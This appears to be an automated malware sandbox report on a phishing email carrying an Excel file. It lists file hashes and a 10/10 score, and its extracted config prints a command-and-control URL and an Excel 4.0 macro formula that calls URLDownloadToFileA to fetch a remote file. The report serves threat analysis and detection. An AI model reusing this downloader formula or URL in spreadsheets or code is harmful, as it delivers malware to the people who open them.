Overview

overview

10

Static

static

10

document-87247454.xls

windows7_x64

10

document-87247454.xls

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    message__A9E01E9854ADB407C4B191065D99E304B19ECE92_unknown_.eml

  • Size

    18KB

  • MD5

    8a970816192957352df0217bcdb36d4a

  • SHA1

    48efc7f8f4f610f4fb7fde597eb026f6d451284d

  • SHA256

    6256f4c5ab30074d0e4e26eae4b1feeba98c42f4d3f71b8eb0e86e4990004b3d

  • SHA512

    bb979e46337ccede084ce639922c8cbef9c2c9819a6c090c660fb7abda6875a08b09c056d67e3ef18c4241e1b2c57e3cfd2d2465d87905eca0787078a6635ef4

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://ywgiu10zmnwcx03vpnyp.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ywgiu10zmnwcx03vpnyp.com/inda.xls","..\fkruf.djr",0)

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • message__A9E01E9854ADB407C4B191065D99E304B19ECE92_unknown_.eml
    .eml
  • collected (73).zip
    .zip
  • document-87247454.xls
    .xls windows office2003
  • email-plain-1.txt